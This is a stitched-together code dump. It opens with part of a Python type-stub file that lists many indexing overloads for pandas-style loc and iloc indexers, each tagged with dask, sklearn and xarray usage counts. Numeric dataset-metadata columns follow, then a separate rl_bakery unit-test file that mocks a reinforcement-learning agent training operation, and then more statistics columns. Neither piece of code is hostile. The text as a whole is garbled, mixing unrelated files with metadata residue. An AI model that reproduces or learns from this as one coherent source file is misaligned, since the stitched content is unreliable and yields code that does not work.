usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["g"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["k"], Literal["o"], Literal["k"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["o"], Literal["t"], Literal["o"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, int, int], Literal["a"]], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["a"]]], /):
"""
usage.dask: 2
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, int, int], List[Literal["a"]]], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, None, int], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, int, None], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[List[int], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, None, int], List[Literal["a"]]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, int, None], List[Literal["a"]]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["A"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["a"]], Literal["A"]], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["a"], Literal["a"], Literal["a"]], Literal["A"]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["A"]]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["a"]], List[Literal["A"]]], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["a"], Literal["a"], Literal["a"]], List[Literal["A"]]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["a"], Literal["o"], Literal["a"]], Literal["A"]],
/,
):
"""
usage.dask: 4
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[Literal["a"], None, Literal["a"]], Literal["A"]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, Literal["o"], None], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["a"], Literal["o"], Literal["a"]], List[Literal["A"]]],
/,
):
"""
usage.dask: 4
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[Literal["a"], None, Literal["a"]], List[Literal["A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, Literal["o"], None], List[Literal["A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["n"]], List[Literal["A"]]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self, _0: Tuple[List[Literal["n", "c", "a"]], List[Literal["A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["c", "a"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["b", "t"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["b"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["t"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[List[Literal["h", "g", "c", "r"]], List[Literal["A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["g", "c"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["h"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["r"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["B"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["j"]], Literal["B"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["j"], Literal["j"], Literal["j"]], Literal["B"]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["B"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["j"]], List[Literal["B"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["j"], Literal["j"], Literal["j"]], List[Literal["B"]]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["j"], Literal["q"], Literal["j"]], Literal["B"]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[Literal["j"], None, Literal["j"]], Literal["B"]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, Literal["q"], None], Literal["B"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["j"], Literal["q"], Literal["j"]], List[Literal["B"]]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[Literal["j"], None, Literal["j"]], List[Literal["B"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, Literal["q"], None], List[Literal["B"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None], slice[Literal["B"], Literal["D"], Literal["B"]]
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["a"], Literal["o"], Literal["a"]],
slice[Literal["B"], Literal["D"], Literal["B"]],
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["a"], None, Literal["a"]],
slice[Literal["B"], Literal["D"], Literal["B"]],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, Literal["o"], None],
slice[Literal["B"], Literal["D"], Literal["B"]],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None], slice[Literal["B"], Literal["A"], Literal["B"]]
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["j"], Literal["q"], Literal["j"]],
slice[Literal["B"], Literal["A"], Literal["B"]],
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["j"], None, Literal["j"]],
slice[Literal["B"], Literal["A"], Literal["B"]],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, Literal["q"], None],
slice[Literal["B"], Literal["A"], Literal["B"]],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[pandas.core.series.Series, Literal["B"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["C", "A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[pandas.core.series.Series, List[Literal["C", "A"]]], /
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], None, Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, Literal["e"], None], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], None, Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["2016-01-03"], Literal["2016-01-05"], Literal["2016-01-03"]],
slice[None, None, None],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[
pandas._libs.tslibs.timestamps.Timestamp,
pandas._libs.tslibs.timestamps.Timestamp,
pandas._libs.tslibs.timestamps.Timestamp,
],
slice[None, None, None],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Literal["2011-01-02"], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: slice[Literal["2011-01-02"], Literal["2011-01-10"], Literal["2011-01-02"]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Literal["2011-01-02 10:00"], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: slice[
pandas._libs.tslibs.period.Period, None, pandas._libs.tslibs.period.Period
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, pandas._libs.tslibs.period.Period, None], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["g"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["f"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["j"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["j"], Literal["l"], Literal["j"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["e"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["i"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["i"], Literal["l"], Literal["i"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["d"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, numpy.int64, None], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, None, numpy.int64], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["e"], Literal["g"], Literal["e"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["d"], Literal["e"], Literal["d"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["d"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["l"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["d"], Literal["l"], Literal["d"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["c"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["p"], Literal["r"], Literal["p"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["p"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["c"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["o"], Literal["r"], Literal["o"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["o"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["c"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["i"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["h"], Literal["i"], Literal["h"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["i"], Literal["j"], Literal["i"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["j"], Literal["n"], Literal["j"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["n"], Literal["o"], Literal["n"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["F"], Literal["J"], Literal["F"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["J"], Literal["a"], Literal["J"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["A"], Literal["F"], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["F"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["e"], Literal["i"], Literal["e"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["I"], Literal["J"], Literal["I"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["A"], Literal["E"], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["E"], Literal["I"], Literal["E"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["E"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["k"], Literal["p"], Literal["k"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["j"], Literal["m"], Literal["j"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["m"], Literal["r"], Literal["m"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["k"], Literal["m"], Literal["k"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["m"], Literal["p"], Literal["m"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["e"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["m"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["g"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["f"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["i"], Literal["m"], Literal["i"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["c"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: List[Literal["y"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["first"]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["first"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["second", "first"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
slice[Literal["first"], Literal["second"], Literal["first"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], numpy.ndarray], /):
"""
usage.sklearn: 3
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["second"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["col1"]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["col1", "col0"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["col1"]]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], slice[None, Literal["first"], None]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
slice[Literal["first"], Literal["first"], Literal["first"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["second"]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["b", "a"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["col_str", "col_cat"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[None, None, None], List[Literal["col_float", "col_int"]]],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[None, None, None], List[Literal["col_int", "col_float"]]],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["col2", "col1"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
List[Literal["petal length (cm)", "sepal length (cm)"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
List[Literal["petal width (cm)", "sepal width (cm)"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["col2"]]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["col_2", "col_1"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
slice[Literal["col_1"], Literal["col_2"], Literal["col_1"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: List[bool], /):
"""
usage.sklearn: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[bool]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["col_2"]], /):
"""
usage.sklearn: 1
"""
...
def __getitem__(self, _0: object, /):
"""
usage.dask: 250
usage.sklearn: 30
usage.xarray: 45
"""
...
class _iLocIndexer:
@overload
def __getitem__(self, _0: int, /):
"""
usage.dask: 9
usage.sklearn: 1
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, int, None], /):
"""
usage.dask: 17
usage.sklearn: 1
usage.xarray: 3
"""
...
@overload
def __getitem__(self, _0: slice[int, int, int], /):
"""
usage.dask: 8
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], int], /):
"""
usage.dask: 11
usage.sklearn: 8
"""
...
@overload
def __getitem__(self, _0: slice[None, numpy.int64, None], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, numpy.int64, numpy.int64], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, int, int], int], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, None, None], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[int, None, int], /):
"""
usage.dask: 5
"""
...
@overload
def __getitem__(self, _0: numpy.ndarray, /):
"""
usage.dask: 1
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, None, numpy.int64], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[int]], /):
"""
usage.dask: 6
usage.sklearn: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[bool]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], slice[int, int, int]], /):
"""
usage.dask: 4
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], numpy.ndarray], /):
"""
usage.sklearn: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], slice[int, int, int]], /):
"""
usage.sklearn: 3
"""
...
@overload
def __getitem__(self, _0: Tuple[numpy.ndarray, int], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, int, None], slice[None, None, None]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[int, int], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: List[int], /):
"""
usage.sklearn: 1
"""
...
def __getitem__(
self,
_0: Union[
slice[
Union[numpy.int64, int, None],
Union[None, numpy.int64, int],
Union[numpy.int64, int, None],
],
Tuple[
Union[
slice[Union[None, int], Union[None, int], Union[None, int]],
numpy.ndarray,
int,
],
Union[
List[Union[int, bool]],
int,
numpy.ndarray,
slice[Union[int, None], Union[int, None], Union[int, None]],
],
],
List[int],
numpy.ndarray,
int,
],
/,
):
"""
usage.dask: 71
usage.sklearn: 24
usage.xarray: 5
"""
...
@overload
def __setitem__(self, _0: Tuple[slice[None, int, None], int], _1: float, /):
"""
usage.dask: 1
"""
...
@overload
def __setitem__(self, _0: int, _1: float, /):
"""
usage.dask: 2
"""
...
@overload
def __setitem__(self, _0: Tuple[List[int], int], _1: float, /):
"""
usage.dask: 1
"""
...
@overload
def __setitem__(self, _0: Tuple[int, int], _1: float, /):
"""
usage.dask: 1
"""
...
@overload
def __setitem__(
self, _0: Tuple[slice[None, None, None], numpy.int32], _1: numpy.float64, /
):
"""
usage.sklearn: 1
"""
...
@overload
def __setitem__(
self, _0: Tuple[slice[None, None, None], int], _1: pandas.core.series.Series, /
):
"""
usage.sklearn: 4
"""
...
def __setitem__(
self,
_0: Union[
Tuple[
Union[int, slice[None, Union[None, int], None], List[int]],
Union[int, numpy.int32],
],
int,
],
_1: Union[numpy.float64, pandas.core.series.Series, float],
/,
):
"""
usage.dask: 5
usage.sklearn: 5
"""
...
| 20.844349
| 88
| 0.428417
| 3,965
| 43,523
| 4.374023
| 0.029004
| 0.071499
| 0.194545
| 0.208441
| 0.936574
| 0.924869
| 0.896442
| 0.889581
| 0.882373
| 0.862884
| 0
| 0.02739
| 0.383429
| 43,523
| 2,087
| 89
| 20.854336
| 0.618893
| 0.089769
| 0
| 0.788641
| 0
| 0
| 0.023301
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230912
| true
| 0.000931
| 0.000931
| 0
| 0.234637
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
7416ebb11958aa383b7967ee2befb60d71e48d24
| 7,278
|
py
|
Python
|
rl_bakery/operation/test_train_agent_operation.py
|
pzhongp/rl-bakery
|
cf0887be7ca424ed81b48e5f9a304d9c6b201fe2
|
[
"Apache-2.0"
] | null | null | null |
rl_bakery/operation/test_train_agent_operation.py
|
pzhongp/rl-bakery
|
cf0887be7ca424ed81b48e5f9a304d9c6b201fe2
|
[
"Apache-2.0"
] | null | null | null |
rl_bakery/operation/test_train_agent_operation.py
|
pzhongp/rl-bakery
|
cf0887be7ca424ed81b48e5f9a304d9c6b201fe2
|
[
"Apache-2.0"
] | null | null | null |
from rl_bakery.applications.tf_rl_application import MockRLApplication
from rl_bakery.data_manager.data_manager import DATANAME
from rl_bakery.engine.abstract_engine_config import MockEngineConfig
from rl_bakery.operation.train_agent_operation import TrainAgentOperation
from rl_bakery.replay_buffer.replay_buffer_abstract import ReplayBufferAbstract
from rl_bakery.spark_utilities import PySparkTestCase
from unittest import TestCase
from unittest.mock import call, patch
class MockReplayBuffer(ReplayBufferAbstract):
def add_batch(self, traj_dict):
pass
def get_batch(self, mini_batch_size):
pass
class TestTrainActionOperation(PySparkTestCase, TestCase):
@patch('rl_bakery.agent_abstract.MockAgent', autospec=True)
@patch('rl_bakery.data_manager.data_manager.DataManager', autospec=True)
@patch('rl_bakery.operation.trajectory_builder.TrajectoryBuilder', autospec=True)
@patch('rl_bakery.operation.test_train_agent_operation.MockReplayBuffer', autospec=True)
def test_run(self, mock_rb, mock_tb, mock_data_manager, mock_agent):
mock_engine_config = MockEngineConfig()
mock_rl_app = MockRLApplication()
MockRLApplication._env_id_cols = ["env_id_1"]
MockRLApplication._ts_id_col = "ts_1"
mock_rl_app.agent_config = {
"num_iterations": 1,
"mini_batch_size": 32
}
run_context_dict = {
"available_data": [("test_data", 0)],
TrainAgentOperation.TRAINING_GLOBAL_STEP: 0
}
mock_data_manager.get_latest.return_value = run_context_dict
mock_timestep = [{"env_id_1": 1, "env_id_2": 2, "ts_1": 1, "obs_1": 1, "obs_2": 2,
"action": 1, "reward": 0.0, "step_type": 0}]
mock_timestep_df = self.spark.createDataFrame(mock_timestep)
def get_side_effect(data_name, _):
if data_name == DATANAME.TIMESTEP:
return mock_timestep_df
else:
return mock_agent
mock_data_manager.get.side_effect = get_side_effect
fake_mini_batch = "fake_mini_batch"
class MockMeta(object):
def __init__(self, prob):
self.probabilities = prob
fake_meta = MockMeta(0.1)
mock_rb.get_batch.return_value = fake_mini_batch, fake_meta
mock_traj_dict = {"observations": [1, 2, 3]}
mock_tb.run.return_value = mock_traj_dict
class MockLoss(object):
def __init__(self, loss):
self.loss = loss
mock_loss = MockLoss("mock_loss")
mock_agent.train.return_value = mock_loss
run_id = 5
operation = TrainAgentOperation(mock_rl_app, mock_engine_config, mock_data_manager)
operation._trajectory_builder = mock_tb
operation._replay_buffer = mock_rb
operation.run(run_id)
get_calls = [
call(DATANAME.MODEL, run_id - 1),
call(DATANAME.TIMESTEP, run_id)
]
mock_data_manager.get.assert_has_calls(get_calls, any_order=True)
mock_tb.run.assert_called_with(mock_timestep_df.collect())
mock_rb.add_batch.assert_called_with(mock_traj_dict)
mock_rb.pre_process.assert_called_with(0)
mock_rb.get_batch.assert_called_with(mock_rl_app.training_config["mini_batch_size"])
mock_agent.train.assert_called_with(fake_mini_batch, fake_meta.probabilities)
mock_rb.post_process.assert_called_with(fake_meta, mock_loss, 0)
expected_metadata = {
"available_data": [("test_data", 0), (DATANAME.MODEL, run_id)],
TrainAgentOperation.TRAINING_GLOBAL_STEP: 0 + mock_rl_app.training_config["num_iterations"]
}
store_calls = [
call(mock_agent, DATANAME.MODEL, run_id),
call(expected_metadata, DATANAME.RUN_CONTEXT, run_id)
]
mock_data_manager.store.assert_has_calls(store_calls, any_order=True)
@patch('rl_bakery.agent_abstract.MockAgent', autospec=True)
@patch('rl_bakery.data_manager.data_manager.DataManager', autospec=True)
@patch('rl_bakery.operation.trajectory_builder.TrajectoryBuilder', autospec=True)
@patch('rl_bakery.operation.test_train_agent_operation.MockReplayBuffer', autospec=True)
def test_run_lag(self, mock_rb, mock_tb, mock_data_manager, mock_agent):
mock_engine_config = MockEngineConfig()
mock_engine_config.training_timestep_lag = 2
mock_rl_app = MockRLApplication()
MockRLApplication._env_id_cols = ["env_id_1"]
MockRLApplication._ts_id_col = "ts_1"
mock_rl_app.agent_config = {
"num_iterations": 1,
"mini_batch_size": 32
}
run_context_dict = {
"available_data": [("test_data", 0)],
TrainAgentOperation.TRAINING_GLOBAL_STEP: 0
}
mock_data_manager.get_latest.return_value = run_context_dict
mock_timestep = [{"env_id_1": 1, "env_id_2": 2, "ts_1": 1, "obs_1": 1, "obs_2": 2,
"action": 1, "reward": 0.0, "step_type": 0}]
mock_timestep_df = self.spark.createDataFrame(mock_timestep)
def get_side_effect(data_name, _):
if data_name == DATANAME.TIMESTEP:
return mock_timestep_df
else:
return mock_agent
mock_data_manager.get.side_effect = get_side_effect
fake_mini_batch = "fake_mini_batch"
class MockMeta(object):
def __init__(self, prob):
self.probabilities = prob
fake_meta = MockMeta(0.1)
mock_rb.get_batch.return_value = fake_mini_batch, fake_meta
mock_traj_dict = {"observations": [1, 2, 3]}
mock_tb.run.return_value = mock_traj_dict
class MockLoss(object):
def __init__(self, loss):
self.loss = loss
mock_loss = MockLoss("mock_loss")
mock_agent.train.return_value = mock_loss
run_id = 5
operation = TrainAgentOperation(mock_rl_app, mock_engine_config, mock_data_manager)
operation._trajectory_builder = mock_tb
operation._replay_buffer = mock_rb
operation.run(run_id)
get_calls = [
call(DATANAME.MODEL, run_id - 1),
call(DATANAME.TIMESTEP, run_id - 2)
]
mock_data_manager.get.assert_has_calls(get_calls, any_order=True)
mock_tb.run.assert_called_with(mock_timestep_df.collect())
mock_rb.add_batch.assert_called_with(mock_traj_dict)
mock_rb.pre_process.assert_called_with(0)
mock_rb.get_batch.assert_called_with(mock_rl_app.training_config["mini_batch_size"])
mock_agent.train.assert_called_with(fake_mini_batch, fake_meta.probabilities)
mock_rb.post_process.assert_called_with(fake_meta, mock_loss, 0)
expected_metadata = {
"available_data": [("test_data", 0), (DATANAME.MODEL, run_id)],
TrainAgentOperation.TRAINING_GLOBAL_STEP: 0 + mock_rl_app.training_config["num_iterations"]
}
store_calls = [
call(mock_agent, DATANAME.MODEL, run_id),
call(expected_metadata, DATANAME.RUN_CONTEXT, run_id)
]
mock_data_manager.store.assert_has_calls(store_calls, any_order=True)
| 40.209945
| 103
| 0.676972
| 916
| 7,278
| 4.946507
| 0.124454
